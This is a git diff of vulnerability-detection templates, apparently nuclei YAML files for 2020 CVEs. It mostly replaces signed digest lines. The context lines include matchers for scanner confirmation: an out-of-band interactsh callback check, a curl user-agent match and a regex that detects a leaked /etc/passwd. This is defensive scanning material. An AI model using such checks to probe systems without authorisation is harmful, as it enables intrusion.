4a0a004730450220301c1ccec08f0b8a2313e6ea62b0556adacd5dd33597547f10af2990730050940221009d500c9bbdf08a1cea7b841a5cbd8ffe901e3271ed97a3a489cd5ab76369ba6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a66d77d6339a98d060dad12b13ebb2707fe60346763427bf4124b9aff03bd66f02203d68d914bf164e3bb5103b08ce59889e62010d804383b0066287219f27556e8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 834d6545f8..1d64c775ac 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a0047304502210095d334a35f712502dc1161437a7636b7816e79ffa45dee8b16943efbfa63e27e022060fcc3b18130248421a20581edc7d0a8925ec9748890b716418f0e3975cddb70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022063e0e67a7bb4fe7ce6ba0af44196796b4cffdb8b70fff7af3985ed6ae9398aec02200602c7500ae30ab21eefcaec3c198f470eec8bf5829fd8b342cec48f61b38624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 2241d75bda..543fa4712c 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220201e093d509e8e0c30a242162cc25c66bbca2852bce51d080ac71d69be11f54a022100f450f10b27a270dfab8c3a426da77b84ef41ddae569328908bb2dbd2541fc858:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2a44e67034e252b8eaa1368807b0901d4b68001bf88f9e753b0b564821c13680221008d7a817fa839ff050349d9cdaca9fcb3e0de721b3bb9561fa6113f630af30573:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index beaf75cc9a..b5b5cbee31 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100c07d30a11232f3e470a77e9b15505d72e8fc22a911ac0d5c2acb28c4edf0400c022100fd575518d252dd3b4ab85b454ff6dac82e4164a2ce65d90dbf7777e8baafbcd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eb65852655cf2ffa9857b498f49d741adc084d90e7df1242789ac0a44d43bf34022050f270e7ab62c2fa8a2308cb4efc9e026e0d04f6c0a9874468caf17cd153bc1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 707a430ff8..a60306679a 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022072e95910e14d9ff1be082249e18d6eea72399f1c598e54a6ab12d28549385947022100820179b216116490ccb55a2625b7ae18f47362e1b8e8ec0b6b9f62583b5165a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f1a6cf25665de90e91bbb0ebe383dbfaba15fb225663e5608fb4c7bccc738ba0221008e53df7ec148d56b49abb761f4706e7c7c403a14fdf56a2d5943d388129cadfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 5c04ab91bf..46ede2aed9 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -47,4 +47,4 @@ http: part: header words: - "Nette Framework" -# digest: 4b0a00483046022100ac87b598c9067d033995e435c1dcfe2b0a70b19bfcf75c66a3f4d747c6eeeccf022100f651a9eeb8c2b466377b7f3e42ef74086dbc33dbe6c116e69b13f39f71622087:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d924020a64f0a7063c6caff4a9736f8c76224609cbd1e10c909d94708c8005040221008a11b53aa999e40c444bc485ce3818802a012f25a0c8f2345f5ee1724e189ccf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 424e6c8506..89d68c6fed 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b82ba9a13156e4a5f1bb8fd1ad13f264d34bd2681f97b51a91d33f002823962a02206f63f05020c012282120b381b87214144f8585fc8d81b8e61d1b1614ca448dae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c4a817a3bf62c93b546943872a006abcedb9e1486cae3c1c1ac90246d2f59d7c022100afbbff76959d05d0167dfd6bfdf2cb8af859278534258eff05a22b63130268d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index e7033cf92c..c70899c66c 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e784ad89af5c1b2c38362287c06a1f7f2ca94adb7a0d811daa81a252f34d401a02200ff9efa5d31f67a479a8e9292f31942deaf5c74cd69d13305223e94c25c60ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb5e9881c975b01fd774c26fde682becc4c9297a8fd95a089e78ee4c671f7687022100f15c7429c7062548c9d3d9aed0e5c9a062cffdb29573017ef2056e9cec4abf68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 9534ddc51c..693c16af64 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -101,4 +101,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 4a0a004730450221009a215b7c44f2fb218def60e0d879afe798183c5f934d27d519c1f12a15ae90bd022071abea3ccb7139b8aaf1d296ad270e2afd6df803ea81281e87c092e97711d955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220634448bc6e6145d018c2163f8a8e5d51214177d2144ccd548e0a8e430cd8a25d022016d72ba966582440fa674d5a0949691d66338e0a04271f3beb6943515d06b2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 949f9cbb72..7bc6078884 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc380765700ef1b2b7da3e313af50c0fde3da0fbfcd22a8d457ce221e7fc062b022054cf01c8bbed23df43e959ca8c4f1ca8a91b866aabce40c770d01b43ec7468eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b72b4c809ec1dc73432999836247ed8d875caed6507e71982ff18144ea3f71fc022100af1fb390a0cdb6ba909ee5a666baf036e93eb65594f434c7b42d44c91871c8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index d049f9e6f5..b89e3e8745 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220159a501f6273ac0121f121b697bdc653c01a5330a5b0fe9fe2ccfa30a638147e022056695f2f7cd28cc34e9a3e87f3d7395878fbebdbc29b626b1b9f94c57c874c78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064bf3659fada478043467e0b827681d9b6c1d684ad21bd10712526371d22b0f00220432d723f568bb4b89fc6924e53d733834abb0727932f1f4fe54fcd3ac1db415a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index 227f3054ff..39fd5f5b36 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100e5e214d6bfbb716a422d227690fe14f4ced278baebc9530e6be6dda0c04edda5022100a4a672fdb2e3ed1d081264ca1f8709c46adb9bc876251bfd3a0495cb0c41ce47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb3a2ef2a09cde2b0e23692833159a34d6152fbc8b95d31f5e32b51fd28898510220178b71d42f5e15eb57599c8f076105a041de943662f0d07909286c98258f32a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 3334e2b247..1f74ed5494 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -54,4 +54,4 @@ http: - 200 - 201 condition: or -# digest: 4b0a00483046022100e0bdde1f10a3c7f9e1773ab527f8cb52ceb62bee9d4dd6c22904db572ee54ac9022100e7db923ffc75f38ed9852638743eae25f446b79004905c011578b05d3c7cfc47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b7dadb5d3fb54a11dbd6440a48bb5cae9db0bfd08dcbec32a08eb7591c6d334e0220357176c8b9439ea772505c04b0752ca005c6da89011edc68685ff5e07be0e38f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 6712bc6cd1..58ea686416 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab34023f96ff9b73ad9b41e60f530d15a806426ebaf266dfa573af429f707066022027a8e1e0e951dbd0be795667ca7497abc9000048460f06fbe56fd555a9416315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035c6b0a2f5e0f37aecb7a50199c790522d1949a5044324d708e794146d3db00d0220486c18e76a30d3b21bad9ed11815b355b18ae96686be8d038ffb67cac1c269e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 4e045e955d..0abb0f89a3 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210092b852f9302eb1a2350db061c59c70735a053c59eb95b4415e36f93732431357022100c8e4a5c459eca3f34966e4ce587f09ac4174a89e0f127b7c9a14f5cf381d461b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200405d06b7c6abb849ba4dc61041541264ed150d1897a323f895961d136ee6889022072e4173dc43e17f87b8dfc2e4ed666bb4aa8e51f6519916f191fd0377e8acc5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 73e1fc696f..3910d2216f 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dfd063b9fa64a8c67ede0a35c9c5ef23fc7ffd9b31d32de5343eaa430bd12815022063f498b2e3e49255cc16b78a9ae2e77f66144915d845e6feae3ced267930d7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b401c220355e120416b45265ecc5dd5655e000c24e193ecfe986474c671bbb89022100d92a22399dddb6b554da7dfe080987ef24df925d38a5fa5c0c5a46256b5d6776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index d6ae07a7b1..be557f5a60 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -65,4 +65,4 @@ http: - 'status_code_3 == 200' - 'contains(body_1, "FUEL CMS")' condition: and -# digest: 490a0046304402200a2e9d98f445334774bd7fe2ae6afd6669809096d55a82f9b6be1e9015a639f2022025f1354f6fd86600a6cc7c44e2401397db0d4619dc406e7213f617f08f281f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c4bf6a24a18789f4b4c053b1ede99fad9d47bbe442a41be6d1ff8f46e32a011022050174e6bebe598ce43b4b667f73bc6aad238238abed9332fd136e43b4feaa386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index a8dd10f9ed..25fdb97add 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206afba9382ef50078a6e10f45af89877a09050cee4ee4f09332c699c120cc20570221009ee5bdbc704e8afa38af4a3db4866cc3cae4b1bdec288b453ac41adf3db45155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a5a0d923bbdf64ab39d269258ab52e2092c633b956aeab4d50dab3d8223317a02203e49feb954b4e04ac3ea988112f5d3375d50f6c4382b8bc8e3df588b7d18020e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 3267e63e23..365714a898 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204bd1705a9455e6871cb3419d303ccfad65755a7bdb6286bf4d77df2f8595aa2202200abf4f4c62097d8b13842832edda25d4bf39ef1baa841854228d08fc794f7316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203656b0e477a05d3fedf942bdba71f0bc4685b49158c9c867b15392d430513ece0220623a926124ebc0171277acfc3108de1c4f55301cb011bf6bf9ae8e56dbad191a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 4de1a02563..66e381dd62 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204b890b4ec1857214ffda11340aa1a4661bbb5dc35de8a1740ccd531d92910d26022008bfdeb53b6cdc73ff693a31a0ee9b55e4aa92c53dfe39bc0349491462a4f66c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220179e8db378444ec8db5c5fcb3bd64d83ad0ceb26cc06374c7ec3c5bc751dc09f022054ac5e1bbb520228894098569dc41dd3c34633523699f6483e947254d925e389:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index 0c43506c12..f78ac0a36d 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -60,4 +60,4 @@ http: - "SLA Misses" - "Task Instances" condition: and -# digest: 4a0a00473045022100f9b0843697463f8e60b12ec56ef0932060ae2d860b8921f95740b592f274713f022053fcc5e9356e6480fab005b56bb10b6931ef145cd764ba9a91e7b44715fcb0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206d68fd41280e585876cfdefb47cc7394176077ee82533c24194f21850e8f41b3022100cd360805a8b3738cc27c3e08d15f9642e5afa3da79ea8e1e4aabf655a92d615e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index f18447b738..68a849e4e7 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -43,4 +43,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100fab6e8757fd37c5b780da0990fec386241d3b06313f471ca7ebe8f6a0a31b40f0220726c800f75a906c6acab6cfa704f40f77d520675350c7a3ca2efc97ed9ea7873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c95df7b80a699a5c469efd05763166e9336345788dcb921f4d7554984ab97434022100ab616a6d4e61409d715aaf95f946dc4cbdf01bcd1eee0e5b82da8de762627444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 39a235d958..7c54b6480f 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -47,4 +47,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100bd3922005e2f1f83e8fc6d03ed0821320876192c346fd423f1e365de6eecda67022007afefdc8787c536742bd021c8c77fecf9c9783282077289ed30c3e2ee522665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c3cf5580aa4db762ce68e2d12fc511beee50a7a1ff3a9a6c60d6a1082ae0f1102202fe9e217585a223c676c328ded6295a13fad15288bb824182301e27ecd2c0bb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index b2e1bb7912..af67953d7e 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d8c3150b6b8a8c0f5c30dc6af03f5ed59f49c7172d5b9c124b0069156c4632002202f26a4fd67b93582ef66040e621eed506f3dc6444c34de7e52f2f8a70cd39ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec03ccaf8d59fb6b4355b6188f4cecad9817f38ce889c7ed6046257af6e24b38022100c88ef66de3fb9773d33608a6df27e242486e0571ebdc0fc6fea38832eeb9a01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index 50c9435141..cc8f1bb510 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ce54269cc6013cc9dfacbcc071ea4ec6aeb9b2705d6dcf5d2f9933efe2f52ac60221009e908e358415d47143c5e20bb6c85ed1313738eef89b12ad1a30fca1ba8d1412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207c5a6a1a0ba24a3efcd4278d0ab2bc16bba05dd186836362b6c3549e086497630220531be7ad858018fbeeff5ab2bc61f58ae75b603553e653582df29ee771dd882c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index dc1cabe26e..1d0f4528a1 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d4bbb411b6f9450007b1b9edaf58699836267245aed9689e95282ebc0fdf4f59022100f73bac44bd11fc2c9c9d451ee9ba4fe317798489718c97090e5aeeafff66d668:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a2d8636097293b05f5d8d16d56f8b8c8e8c769609536b589b787cf244da0e45022100ab22552ea20a35ee593281bb817e9e64f75e5b9c49601a0c2b2d2fcb0137a804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index a79f2bfa25..0adb06cb83 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022006e28c04c6e659e78912043952b0271d2aeef3c1bf3f0bac0fdea8cb76ee8171022100fee8c07cb484ee92a3c0a9102ef9de1b8d6429e5398848261f05f3a3b9507fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f656b6ff200968ecf88fc72175af181dd93db9241900173d0b1c44d111c3c6be022060232e6f5fd6e2e507ed3d05b22b6689f78fdf1c7e98b17bd9c7d25dd48732ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 98bffa6d05..bf90c6d345 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205447757079347b8070e89fe60975aa83c5f776a495770b9fe12acf27f046e0030220569d1f8e17b6d601ebb193264cb7fab1e1dea5fdb12a553bd34fd8f502786c21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202662f3efba8ad4fa6c4bd4eda85a86f4d60bb28f37bc67a89825d2b729a9553402210099ecddb0b9cde3c2562289b3040b8437a617d1d355c9d9792ec5196bf23f71e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index c8079f3177..925ceabce0 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -58,4 +58,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a00483046022100c8831b7a79e58b4e7a67c451f73d3cfb37a6ef3e8e5c080eadc921d72b3f7337022100c542e5c9d7531e4b3e781bbd0655fda3a0f3e96ccce83923abd4935aa15564ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072615c0b0413fad56bc12baf77315c68d55455a08feb9ee2cd445821b41b7f6e022100e7396565ecdedd7cace3b451976ced796bbff7d08bf8ec4db3507bb722269b04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 2796e6885d..aa2eedd675 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c9b0b05dd0d5566e148b27219b5d138bebd927b962661d892abffc7ab6c129a022100c423a96886f0bd34eb700de5fdb5508c514ad9ab63c39a03069d86fa47b9139f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022051a3134fc5f1915833892b85fa1365f58eabd71c5edd9c4d0e5703ce34ec179302202f35ab994046066a9d4d3eff76ed0fceace2fda5aa75b1a08ccc23e41b568d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index bd330c1754..da7ff94265 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100d8797af312f8278f5b2970883e169d0005026e8cf66544ea1c56f941fa37a2ab022100f9e0d410a6eafe296be9a17b89b19819a22377b358619a3abc0d1ec6df6e69ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f32fac0aa8d548e9248b35103897d1472703d6a32bca8c446ba4f1fb9b59d6cb02200e8b61012f8840dda673f78b261f0647fd16af57384cb37b5e358a4c28d14a7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index e6d5ba3cae..93562827b0 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -56,4 +56,4 @@ http: - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" condition: or -# digest: 4b0a0048304602210089c6dea6d48684d424ba49681ecb0835c3fda1e87848d90511a39562e7ec6cda022100dd4f07c17897a40e424f03c994207533a61c994bcffab2a1306cb1ef3585a6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0fdeee5368da1ac4520688c142084a0d8b734d3f3dc2364e07265293d3752e502201bd30580efd05d773cfc766effb15628ba4ec6272220898762fa420fe55846f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 0d6cd0c2db..e6a7925479 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201687a011b3c1d0b082df0fc4bf771617cb0349de4cba006052c27eaba7755f79022100c31de3ab11f6116e0df6b8b2ca349dd4cd9dfbeb7bf1ab32871215d871c1cdbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f46ffc582deb51e533a86dc1fc6d4d941398347583eb7e8ca02e4b13707992c8022100cfd1b655dcf1bb46c7ef45b0d838ad0a2bc161b977782941f0c13052a9b19971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 6727f23c8e..9e95793cbf 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220110601b1a49a68747b9aa3b13bbe9aa31125a8ecb69aea5635e8059b9bccb9cd022100f2d774931b5d7cf5e4fe62bce02077170a346d8e7b43b5fb0bc05e13ef852e8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220279e03501ba082d6f13b2ee38054e5efc91620b3fe82e51ddb94bb7f89161a4b0220539bd79220bce8e69e74a7f3a255bde51c7f0305a7f50ac4dbe4b41ee6be3e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index d1a2ffdb2e..6723aeb449 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 200' - 'contains(body, "Hotel Booking System")' condition: and -# digest: 4a0a00473045022100ea99d63de90c17ef69343663ae409245371b719ba54e6602d603d1104a3cad99022075d17848133ba876d97f93a848b051ebb60d538253ef1ba0dc3a1c8f0df532fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206a88819f2a86877b474553fa4d72a8497496bda2b7febbd32b1d01a50895f70f0220064783fae9efeb7a0a87128c5598da4c150295bc3d5edc3c723dd92cf3bdf564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index b7acdfb1a4..7206405571 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -65,4 +65,4 @@ http: - type: kval kval: - x_jenkins -# digest: 490a0046304402204719e69a3d9212bc5a83bc0637aa260c0f1a472289337a06a0795d661772b79a02203d747ba49dfc9831db6ee04e4a534db4d514e8afd98b86e178e116bf4de12837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202354f112a56f1ae70a3b5ccd8ed37eb1c66ecde2c75ae067591bb47cda8120df022100d43276d553bfd311f13969af700bcae074ca90d9c3ec06fcc042833fdff09298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 7255e5e5be..2347f306a9 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 